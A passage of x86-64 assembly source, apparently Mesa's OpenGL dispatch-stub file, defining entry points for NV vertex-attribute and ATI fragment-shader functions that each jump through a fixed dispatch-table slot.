jmp *%r11
#else
movq _glapi_Dispatch(%rip), %rax
testq %rax, %rax
je 1f
movq 5624(%rax), %r11
jmp *%r11
1:
pushq %rdi
pushq %rsi
pushq %rdx
pushq %rcx
pushq %r8
call _glapi_get_dispatch
popq %r8
popq %rcx
popq %rdx
popq %rsi
popq %rdi
movq 5624(%rax), %r11
jmp *%r11
#endif /* defined(GLX_USE_TLS) */
.size GL_PREFIX(VertexAttribPointerNV), .-GL_PREFIX(VertexAttribPointerNV)
/* glVertexAttribs1dvNV dispatch stub: tail-jumps through
 * dispatch-table slot 704 (byte offset 5632).  Non-TLS paths save the
 * three live argument registers %rdi/%rsi/%rdx; three pushes keep
 * %rsp 16-byte aligned at the lookup call. */
.p2align 4,,15
.globl GL_PREFIX(VertexAttribs1dvNV)
.type GL_PREFIX(VertexAttribs1dvNV), @function
GL_PREFIX(VertexAttribs1dvNV):
#if defined(GLX_USE_TLS)
call _x86_64_get_dispatch@PLT
movq 5632(%rax), %r11
jmp *%r11
#elif defined(PTHREADS)
pushq %rdi
pushq %rsi
pushq %rdx
call _x86_64_get_dispatch@PLT
popq %rdx
popq %rsi
popq %rdi
movq 5632(%rax), %r11
jmp *%r11
#else
movq _glapi_Dispatch(%rip), %rax
testq %rax, %rax
je 1f
movq 5632(%rax), %r11
jmp *%r11
1:
pushq %rdi
pushq %rsi
pushq %rdx
call _glapi_get_dispatch
popq %rdx
popq %rsi
popq %rdi
movq 5632(%rax), %r11
jmp *%r11
#endif /* defined(GLX_USE_TLS) */
.size GL_PREFIX(VertexAttribs1dvNV), .-GL_PREFIX(VertexAttribs1dvNV)
/* glVertexAttribs1fvNV dispatch stub: tail-jumps through
 * dispatch-table slot 705 (byte offset 5640).  Non-TLS paths save
 * %rdi/%rsi/%rdx; three pushes keep %rsp 16-byte aligned at the
 * lookup call. */
.p2align 4,,15
.globl GL_PREFIX(VertexAttribs1fvNV)
.type GL_PREFIX(VertexAttribs1fvNV), @function
GL_PREFIX(VertexAttribs1fvNV):
#if defined(GLX_USE_TLS)
call _x86_64_get_dispatch@PLT
movq 5640(%rax), %r11
jmp *%r11
#elif defined(PTHREADS)
pushq %rdi
pushq %rsi
pushq %rdx
call _x86_64_get_dispatch@PLT
popq %rdx
popq %rsi
popq %rdi
movq 5640(%rax), %r11
jmp *%r11
#else
movq _glapi_Dispatch(%rip), %rax
testq %rax, %rax
je 1f
movq 5640(%rax), %r11
jmp *%r11
1:
pushq %rdi
pushq %rsi
pushq %rdx
call _glapi_get_dispatch
popq %rdx
popq %rsi
popq %rdi
movq 5640(%rax), %r11
jmp *%r11
#endif /* defined(GLX_USE_TLS) */
.size GL_PREFIX(VertexAttribs1fvNV), .-GL_PREFIX(VertexAttribs1fvNV)
/* glVertexAttribs1svNV dispatch stub: tail-jumps through
 * dispatch-table slot 706 (byte offset 5648).  Non-TLS paths save
 * %rdi/%rsi/%rdx; three pushes keep %rsp 16-byte aligned at the
 * lookup call. */
.p2align 4,,15
.globl GL_PREFIX(VertexAttribs1svNV)
.type GL_PREFIX(VertexAttribs1svNV), @function
GL_PREFIX(VertexAttribs1svNV):
#if defined(GLX_USE_TLS)
call _x86_64_get_dispatch@PLT
movq 5648(%rax), %r11
jmp *%r11
#elif defined(PTHREADS)
pushq %rdi
pushq %rsi
pushq %rdx
call _x86_64_get_dispatch@PLT
popq %rdx
popq %rsi
popq %rdi
movq 5648(%rax), %r11
jmp *%r11
#else
movq _glapi_Dispatch(%rip), %rax
testq %rax, %rax
je 1f
movq 5648(%rax), %r11
jmp *%r11
1:
pushq %rdi
pushq %rsi
pushq %rdx
call _glapi_get_dispatch
popq %rdx
popq %rsi
popq %rdi
movq 5648(%rax), %r11
jmp *%r11
#endif /* defined(GLX_USE_TLS) */
.size GL_PREFIX(VertexAttribs1svNV), .-GL_PREFIX(VertexAttribs1svNV)
/* glVertexAttribs2dvNV dispatch stub: tail-jumps through
 * dispatch-table slot 707 (byte offset 5656).  Non-TLS paths save
 * %rdi/%rsi/%rdx; three pushes keep %rsp 16-byte aligned at the
 * lookup call. */
.p2align 4,,15
.globl GL_PREFIX(VertexAttribs2dvNV)
.type GL_PREFIX(VertexAttribs2dvNV), @function
GL_PREFIX(VertexAttribs2dvNV):
#if defined(GLX_USE_TLS)
call _x86_64_get_dispatch@PLT
movq 5656(%rax), %r11
jmp *%r11
#elif defined(PTHREADS)
pushq %rdi
pushq %rsi
pushq %rdx
call _x86_64_get_dispatch@PLT
popq %rdx
popq %rsi
popq %rdi
movq 5656(%rax), %r11
jmp *%r11
#else
movq _glapi_Dispatch(%rip), %rax
testq %rax, %rax
je 1f
movq 5656(%rax), %r11
jmp *%r11
1:
pushq %rdi
pushq %rsi
pushq %rdx
call _glapi_get_dispatch
popq %rdx
popq %rsi
popq %rdi
movq 5656(%rax), %r11
jmp *%r11
#endif /* defined(GLX_USE_TLS) */
.size GL_PREFIX(VertexAttribs2dvNV), .-GL_PREFIX(VertexAttribs2dvNV)
/* glVertexAttribs2fvNV dispatch stub: tail-jumps through
 * dispatch-table slot 708 (byte offset 5664).  Non-TLS paths save
 * %rdi/%rsi/%rdx; three pushes keep %rsp 16-byte aligned at the
 * lookup call. */
.p2align 4,,15
.globl GL_PREFIX(VertexAttribs2fvNV)
.type GL_PREFIX(VertexAttribs2fvNV), @function
GL_PREFIX(VertexAttribs2fvNV):
#if defined(GLX_USE_TLS)
call _x86_64_get_dispatch@PLT
movq 5664(%rax), %r11
jmp *%r11
#elif defined(PTHREADS)
pushq %rdi
pushq %rsi
pushq %rdx
call _x86_64_get_dispatch@PLT
popq %rdx
popq %rsi
popq %rdi
movq 5664(%rax), %r11
jmp *%r11
#else
movq _glapi_Dispatch(%rip), %rax
testq %rax, %rax
je 1f
movq 5664(%rax), %r11
jmp *%r11
1:
pushq %rdi
pushq %rsi
pushq %rdx
call _glapi_get_dispatch
popq %rdx
popq %rsi
popq %rdi
movq 5664(%rax), %r11
jmp *%r11
#endif /* defined(GLX_USE_TLS) */
.size GL_PREFIX(VertexAttribs2fvNV), .-GL_PREFIX(VertexAttribs2fvNV)
/* glVertexAttribs2svNV dispatch stub: tail-jumps through
 * dispatch-table slot 709 (byte offset 5672).  Non-TLS paths save
 * %rdi/%rsi/%rdx; three pushes keep %rsp 16-byte aligned at the
 * lookup call. */
.p2align 4,,15
.globl GL_PREFIX(VertexAttribs2svNV)
.type GL_PREFIX(VertexAttribs2svNV), @function
GL_PREFIX(VertexAttribs2svNV):
#if defined(GLX_USE_TLS)
call _x86_64_get_dispatch@PLT
movq 5672(%rax), %r11
jmp *%r11
#elif defined(PTHREADS)
pushq %rdi
pushq %rsi
pushq %rdx
call _x86_64_get_dispatch@PLT
popq %rdx
popq %rsi
popq %rdi
movq 5672(%rax), %r11
jmp *%r11
#else
movq _glapi_Dispatch(%rip), %rax
testq %rax, %rax
je 1f
movq 5672(%rax), %r11
jmp *%r11
1:
pushq %rdi
pushq %rsi
pushq %rdx
call _glapi_get_dispatch
popq %rdx
popq %rsi
popq %rdi
movq 5672(%rax), %r11
jmp *%r11
#endif /* defined(GLX_USE_TLS) */
.size GL_PREFIX(VertexAttribs2svNV), .-GL_PREFIX(VertexAttribs2svNV)
/* glVertexAttribs3dvNV dispatch stub: tail-jumps through
 * dispatch-table slot 710 (byte offset 5680).  Non-TLS paths save
 * %rdi/%rsi/%rdx; three pushes keep %rsp 16-byte aligned at the
 * lookup call. */
.p2align 4,,15
.globl GL_PREFIX(VertexAttribs3dvNV)
.type GL_PREFIX(VertexAttribs3dvNV), @function
GL_PREFIX(VertexAttribs3dvNV):
#if defined(GLX_USE_TLS)
call _x86_64_get_dispatch@PLT
movq 5680(%rax), %r11
jmp *%r11
#elif defined(PTHREADS)
pushq %rdi
pushq %rsi
pushq %rdx
call _x86_64_get_dispatch@PLT
popq %rdx
popq %rsi
popq %rdi
movq 5680(%rax), %r11
jmp *%r11
#else
movq _glapi_Dispatch(%rip), %rax
testq %rax, %rax
je 1f
movq 5680(%rax), %r11
jmp *%r11
1:
pushq %rdi
pushq %rsi
pushq %rdx
call _glapi_get_dispatch
popq %rdx
popq %rsi
popq %rdi
movq 5680(%rax), %r11
jmp *%r11
#endif /* defined(GLX_USE_TLS) */
.size GL_PREFIX(VertexAttribs3dvNV), .-GL_PREFIX(VertexAttribs3dvNV)
/* glVertexAttribs3fvNV dispatch stub: tail-jumps through
 * dispatch-table slot 711 (byte offset 5688).  Non-TLS paths save
 * %rdi/%rsi/%rdx; three pushes keep %rsp 16-byte aligned at the
 * lookup call. */
.p2align 4,,15
.globl GL_PREFIX(VertexAttribs3fvNV)
.type GL_PREFIX(VertexAttribs3fvNV), @function
GL_PREFIX(VertexAttribs3fvNV):
#if defined(GLX_USE_TLS)
call _x86_64_get_dispatch@PLT
movq 5688(%rax), %r11
jmp *%r11
#elif defined(PTHREADS)
pushq %rdi
pushq %rsi
pushq %rdx
call _x86_64_get_dispatch@PLT
popq %rdx
popq %rsi
popq %rdi
movq 5688(%rax), %r11
jmp *%r11
#else
movq _glapi_Dispatch(%rip), %rax
testq %rax, %rax
je 1f
movq 5688(%rax), %r11
jmp *%r11
1:
pushq %rdi
pushq %rsi
pushq %rdx
call _glapi_get_dispatch
popq %rdx
popq %rsi
popq %rdi
movq 5688(%rax), %r11
jmp *%r11
#endif /* defined(GLX_USE_TLS) */
.size GL_PREFIX(VertexAttribs3fvNV), .-GL_PREFIX(VertexAttribs3fvNV)
/* glVertexAttribs3svNV dispatch stub: tail-jumps through
 * dispatch-table slot 712 (byte offset 5696).  Non-TLS paths save
 * %rdi/%rsi/%rdx; three pushes keep %rsp 16-byte aligned at the
 * lookup call. */
.p2align 4,,15
.globl GL_PREFIX(VertexAttribs3svNV)
.type GL_PREFIX(VertexAttribs3svNV), @function
GL_PREFIX(VertexAttribs3svNV):
#if defined(GLX_USE_TLS)
call _x86_64_get_dispatch@PLT
movq 5696(%rax), %r11
jmp *%r11
#elif defined(PTHREADS)
pushq %rdi
pushq %rsi
pushq %rdx
call _x86_64_get_dispatch@PLT
popq %rdx
popq %rsi
popq %rdi
movq 5696(%rax), %r11
jmp *%r11
#else
movq _glapi_Dispatch(%rip), %rax
testq %rax, %rax
je 1f
movq 5696(%rax), %r11
jmp *%r11
1:
pushq %rdi
pushq %rsi
pushq %rdx
call _glapi_get_dispatch
popq %rdx
popq %rsi
popq %rdi
movq 5696(%rax), %r11
jmp *%r11
#endif /* defined(GLX_USE_TLS) */
.size GL_PREFIX(VertexAttribs3svNV), .-GL_PREFIX(VertexAttribs3svNV)
/* glVertexAttribs4dvNV dispatch stub: tail-jumps through
 * dispatch-table slot 713 (byte offset 5704).  Non-TLS paths save
 * %rdi/%rsi/%rdx; three pushes keep %rsp 16-byte aligned at the
 * lookup call. */
.p2align 4,,15
.globl GL_PREFIX(VertexAttribs4dvNV)
.type GL_PREFIX(VertexAttribs4dvNV), @function
GL_PREFIX(VertexAttribs4dvNV):
#if defined(GLX_USE_TLS)
call _x86_64_get_dispatch@PLT
movq 5704(%rax), %r11
jmp *%r11
#elif defined(PTHREADS)
pushq %rdi
pushq %rsi
pushq %rdx
call _x86_64_get_dispatch@PLT
popq %rdx
popq %rsi
popq %rdi
movq 5704(%rax), %r11
jmp *%r11
#else
movq _glapi_Dispatch(%rip), %rax
testq %rax, %rax
je 1f
movq 5704(%rax), %r11
jmp *%r11
1:
pushq %rdi
pushq %rsi
pushq %rdx
call _glapi_get_dispatch
popq %rdx
popq %rsi
popq %rdi
movq 5704(%rax), %r11
jmp *%r11
#endif /* defined(GLX_USE_TLS) */
.size GL_PREFIX(VertexAttribs4dvNV), .-GL_PREFIX(VertexAttribs4dvNV)
/* glVertexAttribs4fvNV dispatch stub: tail-jumps through
 * dispatch-table slot 714 (byte offset 5712).  Non-TLS paths save
 * %rdi/%rsi/%rdx; three pushes keep %rsp 16-byte aligned at the
 * lookup call. */
.p2align 4,,15
.globl GL_PREFIX(VertexAttribs4fvNV)
.type GL_PREFIX(VertexAttribs4fvNV), @function
GL_PREFIX(VertexAttribs4fvNV):
#if defined(GLX_USE_TLS)
call _x86_64_get_dispatch@PLT
movq 5712(%rax), %r11
jmp *%r11
#elif defined(PTHREADS)
pushq %rdi
pushq %rsi
pushq %rdx
call _x86_64_get_dispatch@PLT
popq %rdx
popq %rsi
popq %rdi
movq 5712(%rax), %r11
jmp *%r11
#else
movq _glapi_Dispatch(%rip), %rax
testq %rax, %rax
je 1f
movq 5712(%rax), %r11
jmp *%r11
1:
pushq %rdi
pushq %rsi
pushq %rdx
call _glapi_get_dispatch
popq %rdx
popq %rsi
popq %rdi
movq 5712(%rax), %r11
jmp *%r11
#endif /* defined(GLX_USE_TLS) */
.size GL_PREFIX(VertexAttribs4fvNV), .-GL_PREFIX(VertexAttribs4fvNV)
/* glVertexAttribs4svNV dispatch stub: tail-jumps through
 * dispatch-table slot 715 (byte offset 5720).  Non-TLS paths save
 * %rdi/%rsi/%rdx; three pushes keep %rsp 16-byte aligned at the
 * lookup call. */
.p2align 4,,15
.globl GL_PREFIX(VertexAttribs4svNV)
.type GL_PREFIX(VertexAttribs4svNV), @function
GL_PREFIX(VertexAttribs4svNV):
#if defined(GLX_USE_TLS)
call _x86_64_get_dispatch@PLT
movq 5720(%rax), %r11
jmp *%r11
#elif defined(PTHREADS)
pushq %rdi
pushq %rsi
pushq %rdx
call _x86_64_get_dispatch@PLT
popq %rdx
popq %rsi
popq %rdi
movq 5720(%rax), %r11
jmp *%r11
#else
movq _glapi_Dispatch(%rip), %rax
testq %rax, %rax
je 1f
movq 5720(%rax), %r11
jmp *%r11
1:
pushq %rdi
pushq %rsi
pushq %rdx
call _glapi_get_dispatch
popq %rdx
popq %rsi
popq %rdi
movq 5720(%rax), %r11
jmp *%r11
#endif /* defined(GLX_USE_TLS) */
.size GL_PREFIX(VertexAttribs4svNV), .-GL_PREFIX(VertexAttribs4svNV)
/* glVertexAttribs4ubvNV dispatch stub: tail-jumps through
 * dispatch-table slot 716 (byte offset 5728).  Non-TLS paths save
 * %rdi/%rsi/%rdx; three pushes keep %rsp 16-byte aligned at the
 * lookup call. */
.p2align 4,,15
.globl GL_PREFIX(VertexAttribs4ubvNV)
.type GL_PREFIX(VertexAttribs4ubvNV), @function
GL_PREFIX(VertexAttribs4ubvNV):
#if defined(GLX_USE_TLS)
call _x86_64_get_dispatch@PLT
movq 5728(%rax), %r11
jmp *%r11
#elif defined(PTHREADS)
pushq %rdi
pushq %rsi
pushq %rdx
call _x86_64_get_dispatch@PLT
popq %rdx
popq %rsi
popq %rdi
movq 5728(%rax), %r11
jmp *%r11
#else
movq _glapi_Dispatch(%rip), %rax
testq %rax, %rax
je 1f
movq 5728(%rax), %r11
jmp *%r11
1:
pushq %rdi
pushq %rsi
pushq %rdx
call _glapi_get_dispatch
popq %rdx
popq %rsi
popq %rdi
movq 5728(%rax), %r11
jmp *%r11
#endif /* defined(GLX_USE_TLS) */
.size GL_PREFIX(VertexAttribs4ubvNV), .-GL_PREFIX(VertexAttribs4ubvNV)
/* glAlphaFragmentOp1ATI dispatch stub: tail-jumps through
 * dispatch-table slot 717 (byte offset 5736).  Non-TLS paths save all
 * six integer argument registers %rdi/%rsi/%rdx/%rcx/%r8/%r9 around
 * the lookup call; the seventh push of %rbp is 16-byte
 * stack-alignment padding. */
.p2align 4,,15
.globl GL_PREFIX(AlphaFragmentOp1ATI)
.type GL_PREFIX(AlphaFragmentOp1ATI), @function
GL_PREFIX(AlphaFragmentOp1ATI):
#if defined(GLX_USE_TLS)
call _x86_64_get_dispatch@PLT
movq 5736(%rax), %r11
jmp *%r11
#elif defined(PTHREADS)
pushq %rdi
pushq %rsi
pushq %rdx
pushq %rcx
pushq %r8
pushq %r9
pushq %rbp
call _x86_64_get_dispatch@PLT
popq %rbp
popq %r9
popq %r8
popq %rcx
popq %rdx
popq %rsi
popq %rdi
movq 5736(%rax), %r11
jmp *%r11
#else
movq _glapi_Dispatch(%rip), %rax
testq %rax, %rax
je 1f
movq 5736(%rax), %r11
jmp *%r11
1:
pushq %rdi
pushq %rsi
pushq %rdx
pushq %rcx
pushq %r8
pushq %r9
pushq %rbp
call _glapi_get_dispatch
popq %rbp
popq %r9
popq %r8
popq %rcx
popq %rdx
popq %rsi
popq %rdi
movq 5736(%rax), %r11
jmp *%r11
#endif /* defined(GLX_USE_TLS) */
.size GL_PREFIX(AlphaFragmentOp1ATI), .-GL_PREFIX(AlphaFragmentOp1ATI)
/* glAlphaFragmentOp2ATI dispatch stub: tail-jumps through
 * dispatch-table slot 718 (byte offset 5744).  Non-TLS paths save all
 * six integer argument registers (args beyond six arrive on the stack
 * and need no saving); the %rbp push is stack-alignment padding. */
.p2align 4,,15
.globl GL_PREFIX(AlphaFragmentOp2ATI)
.type GL_PREFIX(AlphaFragmentOp2ATI), @function
GL_PREFIX(AlphaFragmentOp2ATI):
#if defined(GLX_USE_TLS)
call _x86_64_get_dispatch@PLT
movq 5744(%rax), %r11
jmp *%r11
#elif defined(PTHREADS)
pushq %rdi
pushq %rsi
pushq %rdx
pushq %rcx
pushq %r8
pushq %r9
pushq %rbp
call _x86_64_get_dispatch@PLT
popq %rbp
popq %r9
popq %r8
popq %rcx
popq %rdx
popq %rsi
popq %rdi
movq 5744(%rax), %r11
jmp *%r11
#else
movq _glapi_Dispatch(%rip), %rax
testq %rax, %rax
je 1f
movq 5744(%rax), %r11
jmp *%r11
1:
pushq %rdi
pushq %rsi
pushq %rdx
pushq %rcx
pushq %r8
pushq %r9
pushq %rbp
call _glapi_get_dispatch
popq %rbp
popq %r9
popq %r8
popq %rcx
popq %rdx
popq %rsi
popq %rdi
movq 5744(%rax), %r11
jmp *%r11
#endif /* defined(GLX_USE_TLS) */
.size GL_PREFIX(AlphaFragmentOp2ATI), .-GL_PREFIX(AlphaFragmentOp2ATI)
/* glAlphaFragmentOp3ATI dispatch stub: tail-jumps through
 * dispatch-table slot 719 (byte offset 5752).  Non-TLS paths save all
 * six integer argument registers; stack-passed arguments survive the
 * lookup call untouched.  The %rbp push is alignment padding.
 * NOTE(review): this stub jumps (not calls) to the real entry, so the
 * callee sees the caller's original stack-argument layout intact. */
.p2align 4,,15
.globl GL_PREFIX(AlphaFragmentOp3ATI)
.type GL_PREFIX(AlphaFragmentOp3ATI), @function
GL_PREFIX(AlphaFragmentOp3ATI):
#if defined(GLX_USE_TLS)
call _x86_64_get_dispatch@PLT
movq 5752(%rax), %r11
jmp *%r11
#elif defined(PTHREADS)
pushq %rdi
pushq %rsi
pushq %rdx
pushq %rcx
pushq %r8
pushq %r9
pushq %rbp
call _x86_64_get_dispatch@PLT
popq %rbp
popq %r9
popq %r8
popq %rcx
popq %rdx
popq %rsi
popq %rdi
movq 5752(%rax), %r11
jmp *%r11
#else
movq _glapi_Dispatch(%rip), %rax
testq %rax, %rax
je 1f
movq 5752(%rax), %r11
jmp *%r11
1:
pushq %rdi
pushq %rsi
pushq %rdx
pushq %rcx
pushq %r8
pushq %r9
pushq %rbp
call _glapi_get_dispatch
popq %rbp
popq %r9
popq %r8
popq %rcx
popq %rdx
popq %rsi
popq %rdi
movq 5752(%rax), %r11
jmp *%r11
#endif /* defined(GLX_USE_TLS) */
.size GL_PREFIX(AlphaFragmentOp3ATI), .-GL_PREFIX(AlphaFragmentOp3ATI)
/* glBeginFragmentShaderATI dispatch stub: tail-jumps through
 * dispatch-table slot 720 (byte offset 5760).  Takes no arguments;
 * the single %rbp push only restores 16-byte stack alignment for the
 * dispatch-lookup call. */
.p2align 4,,15
.globl GL_PREFIX(BeginFragmentShaderATI)
.type GL_PREFIX(BeginFragmentShaderATI), @function
GL_PREFIX(BeginFragmentShaderATI):
#if defined(GLX_USE_TLS)
call _x86_64_get_dispatch@PLT
movq 5760(%rax), %r11
jmp *%r11
#elif defined(PTHREADS)
pushq %rbp
call _x86_64_get_dispatch@PLT
popq %rbp
movq 5760(%rax), %r11
jmp *%r11
#else
movq _glapi_Dispatch(%rip), %rax
testq %rax, %rax
je 1f
movq 5760(%rax), %r11
jmp *%r11
1:
pushq %rbp
call _glapi_get_dispatch
popq %rbp
movq 5760(%rax), %r11
jmp *%r11
#endif /* defined(GLX_USE_TLS) */
.size GL_PREFIX(BeginFragmentShaderATI), .-GL_PREFIX(BeginFragmentShaderATI)
/* glBindFragmentShaderATI dispatch stub: tail-jumps through
 * dispatch-table slot 721 (byte offset 5768).  The single argument in
 * %rdi is saved across the lookup call; one push also realigns %rsp
 * to 16 bytes at the call. */
.p2align 4,,15
.globl GL_PREFIX(BindFragmentShaderATI)
.type GL_PREFIX(BindFragmentShaderATI), @function
GL_PREFIX(BindFragmentShaderATI):
#if defined(GLX_USE_TLS)
call _x86_64_get_dispatch@PLT
movq 5768(%rax), %r11
jmp *%r11
#elif defined(PTHREADS)
pushq %rdi
call _x86_64_get_dispatch@PLT
popq %rdi
movq 5768(%rax), %r11
jmp *%r11
#else
movq _glapi_Dispatch(%rip), %rax
testq %rax, %rax
je 1f
movq 5768(%rax), %r11
jmp *%r11
1:
pushq %rdi
call _glapi_get_dispatch
popq %rdi
movq 5768(%rax), %r11
jmp *%r11
#endif /* defined(GLX_USE_TLS) */
.size GL_PREFIX(BindFragmentShaderATI), .-GL_PREFIX(BindFragmentShaderATI)
/* glColorFragmentOp1ATI dispatch stub: tail-jumps through
 * dispatch-table slot 722 (byte offset 5776).  Non-TLS paths save all
 * six integer argument registers %rdi/%rsi/%rdx/%rcx/%r8/%r9; the
 * %rbp push is 16-byte stack-alignment padding. */
.p2align 4,,15
.globl GL_PREFIX(ColorFragmentOp1ATI)
.type GL_PREFIX(ColorFragmentOp1ATI), @function
GL_PREFIX(ColorFragmentOp1ATI):
#if defined(GLX_USE_TLS)
call _x86_64_get_dispatch@PLT
movq 5776(%rax), %r11
jmp *%r11
#elif defined(PTHREADS)
pushq %rdi
pushq %rsi
pushq %rdx
pushq %rcx
pushq %r8
pushq %r9
pushq %rbp
call _x86_64_get_dispatch@PLT
popq %rbp
popq %r9
popq %r8
popq %rcx
popq %rdx
popq %rsi
popq %rdi
movq 5776(%rax), %r11
jmp *%r11
#else
movq _glapi_Dispatch(%rip), %rax
testq %rax, %rax
je 1f
movq 5776(%rax), %r11
jmp *%r11
1:
pushq %rdi
pushq %rsi
pushq %rdx
pushq %rcx
pushq %r8
pushq %r9
pushq %rbp
call _glapi_get_dispatch
popq %rbp
popq %r9
popq %r8
popq %rcx
popq %rdx
popq %rsi
popq %rdi
movq 5776(%rax), %r11
jmp *%r11
#endif /* defined(GLX_USE_TLS) */
.size GL_PREFIX(ColorFragmentOp1ATI), .-GL_PREFIX(ColorFragmentOp1ATI)
/* glColorFragmentOp2ATI dispatch stub: tail-jumps through
 * dispatch-table slot 723 (byte offset 5784).  Non-TLS paths save all
 * six integer argument registers (stack-passed args need no saving);
 * the %rbp push is stack-alignment padding. */
.p2align 4,,15
.globl GL_PREFIX(ColorFragmentOp2ATI)
.type GL_PREFIX(ColorFragmentOp2ATI), @function
GL_PREFIX(ColorFragmentOp2ATI):
#if defined(GLX_USE_TLS)
call _x86_64_get_dispatch@PLT
movq 5784(%rax), %r11
jmp *%r11
#elif defined(PTHREADS)
pushq %rdi
pushq %rsi
pushq %rdx
pushq %rcx
pushq %r8
pushq %r9
pushq %rbp
call _x86_64_get_dispatch@PLT
popq %rbp
popq %r9
popq %r8
popq %rcx
popq %rdx
popq %rsi
popq %rdi
movq 5784(%rax), %r11
jmp *%r11
#else
movq _glapi_Dispatch(%rip), %rax
testq %rax, %rax
je 1f
movq 5784(%rax), %r11
jmp *%r11
1:
pushq %rdi
pushq %rsi
pushq %rdx
pushq %rcx
pushq %r8
pushq %r9
pushq %rbp
call _glapi_get_dispatch
popq %rbp
popq %r9
popq %r8
popq %rcx
popq %rdx
popq %rsi
popq %rdi
movq 5784(%rax), %r11
jmp *%r11
#endif /* defined(GLX_USE_TLS) */
.size GL_PREFIX(ColorFragmentOp2ATI), .-GL_PREFIX(ColorFragmentOp2ATI)
/* glColorFragmentOp3ATI dispatch stub: tail-jumps through
 * dispatch-table slot 724 (byte offset 5792).  Non-TLS paths save all
 * six integer argument registers; the %rbp push is stack-alignment
 * padding.  The final jmp (not call) leaves the caller's stack
 * arguments in place for the real entry point. */
.p2align 4,,15
.globl GL_PREFIX(ColorFragmentOp3ATI)
.type GL_PREFIX(ColorFragmentOp3ATI), @function
GL_PREFIX(ColorFragmentOp3ATI):
#if defined(GLX_USE_TLS)
call _x86_64_get_dispatch@PLT
movq 5792(%rax), %r11
jmp *%r11
#elif defined(PTHREADS)
pushq %rdi
pushq %rsi
pushq %rdx
pushq %rcx
pushq %r8
pushq %r9
pushq %rbp
call _x86_64_get_dispatch@PLT
popq %rbp
popq %r9
popq %r8
popq %rcx
popq %rdx
popq %rsi
popq %rdi
movq 5792(%rax), %r11
jmp *%r11
#else
movq _glapi_Dispatch(%rip), %rax
testq %rax, %rax
je 1f
movq 5792(%rax), %r11
jmp *%r11
1:
pushq %rdi
pushq %rsi
pushq %rdx
pushq %rcx
pushq %r8
pushq %r9
pushq %rbp
call _glapi_get_dispatch
popq %rbp
popq %r9
popq %r8
popq %rcx
popq %rdx
popq %rsi
popq %rdi
movq 5792(%rax), %r11
jmp *%r11
#endif /* defined(GLX_USE_TLS) */
.size GL_PREFIX(ColorFragmentOp3ATI), .-GL_PREFIX(ColorFragmentOp3ATI)
/* glDeleteFragmentShaderATI dispatch stub: tail-jumps through
 * dispatch-table slot 725 (byte offset 5800).  The single argument in
 * %rdi is saved across the lookup call; one push also realigns %rsp. */
.p2align 4,,15
.globl GL_PREFIX(DeleteFragmentShaderATI)
.type GL_PREFIX(DeleteFragmentShaderATI), @function
GL_PREFIX(DeleteFragmentShaderATI):
#if defined(GLX_USE_TLS)
call _x86_64_get_dispatch@PLT
movq 5800(%rax), %r11
jmp *%r11
#elif defined(PTHREADS)
pushq %rdi
call _x86_64_get_dispatch@PLT
popq %rdi
movq 5800(%rax), %r11
jmp *%r11
#else
movq _glapi_Dispatch(%rip), %rax
testq %rax, %rax
je 1f
movq 5800(%rax), %r11
jmp *%r11
1:
pushq %rdi
call _glapi_get_dispatch
popq %rdi
movq 5800(%rax), %r11
jmp *%r11
#endif /* defined(GLX_USE_TLS) */
.size GL_PREFIX(DeleteFragmentShaderATI), .-GL_PREFIX(DeleteFragmentShaderATI)
/* glEndFragmentShaderATI dispatch stub: tail-jumps through
 * dispatch-table slot 726 (byte offset 5808).  Takes no arguments;
 * the single %rbp push only restores 16-byte stack alignment for the
 * dispatch-lookup call. */
.p2align 4,,15
.globl GL_PREFIX(EndFragmentShaderATI)
.type GL_PREFIX(EndFragmentShaderATI), @function
GL_PREFIX(EndFragmentShaderATI):
#if defined(GLX_USE_TLS)
call _x86_64_get_dispatch@PLT
movq 5808(%rax), %r11
jmp *%r11
#elif defined(PTHREADS)
pushq %rbp
call _x86_64_get_dispatch@PLT
popq %rbp
movq 5808(%rax), %r11
jmp *%r11
#else
movq _glapi_Dispatch(%rip), %rax
testq %rax, %rax
je 1f
movq 5808(%rax), %r11
jmp *%r11
1:
pushq %rbp
call _glapi_get_dispatch
popq %rbp
movq 5808(%rax), %r11
jmp *%r11
#endif /* defined(GLX_USE_TLS) */
.size GL_PREFIX(EndFragmentShaderATI), .-GL_PREFIX(EndFragmentShaderATI)
.p2align 4,,15
.globl GL_PREFIX(GenFragmentShadersATI)
.type GL_PREFIX(GenFragmentShadersATI), @function
/*
 * glGenFragmentShadersATI dispatch stub — jumps through dispatch slot 727
 * (offset 5816); saves %rdi around the table-lookup call.
 */
GL_PREFIX(GenFragmentShadersATI):
#if defined(GLX_USE_TLS)
call _x86_64_get_dispatch@PLT
movq 5816(%rax), %r11
jmp *%r11
#elif defined(PTHREADS)
pushq %rdi
call _x86_64_get_dispatch@PLT
popq %rdi
movq 5816(%rax), %r11
jmp *%r11
#else
movq _glapi_Dispatch(%rip), %rax
testq %rax, %rax
je 1f
movq 5816(%rax), %r11
jmp *%r11
1:
pushq %rdi
call _glapi_get_dispatch
popq %rdi
movq 5816(%rax), %r11
jmp *%r11
#endif /* defined(GLX_USE_TLS) */
.size GL_PREFIX(GenFragmentShadersATI), .-GL_PREFIX(GenFragmentShadersATI)
.p2align 4,,15
.globl GL_PREFIX(PassTexCoordATI)
.type GL_PREFIX(PassTexCoordATI), @function
/*
 * glPassTexCoordATI dispatch stub — jumps through dispatch slot 728
 * (offset 5824); saves the three arg registers %rdi/%rsi/%rdx around the
 * lookup call (odd push count keeps %rsp 16-byte aligned).
 */
GL_PREFIX(PassTexCoordATI):
#if defined(GLX_USE_TLS)
call _x86_64_get_dispatch@PLT
movq 5824(%rax), %r11
jmp *%r11
#elif defined(PTHREADS)
pushq %rdi
pushq %rsi
pushq %rdx
call _x86_64_get_dispatch@PLT
popq %rdx
popq %rsi
popq %rdi
movq 5824(%rax), %r11
jmp *%r11
#else
movq _glapi_Dispatch(%rip), %rax
testq %rax, %rax
je 1f
movq 5824(%rax), %r11
jmp *%r11
1:
pushq %rdi
pushq %rsi
pushq %rdx
call _glapi_get_dispatch
popq %rdx
popq %rsi
popq %rdi
movq 5824(%rax), %r11
jmp *%r11
#endif /* defined(GLX_USE_TLS) */
.size GL_PREFIX(PassTexCoordATI), .-GL_PREFIX(PassTexCoordATI)
.p2align 4,,15
.globl GL_PREFIX(SampleMapATI)
.type GL_PREFIX(SampleMapATI), @function
/*
 * glSampleMapATI dispatch stub — jumps through dispatch slot 729
 * (offset 5832); saves %rdi/%rsi/%rdx around the lookup call.
 */
GL_PREFIX(SampleMapATI):
#if defined(GLX_USE_TLS)
call _x86_64_get_dispatch@PLT
movq 5832(%rax), %r11
jmp *%r11
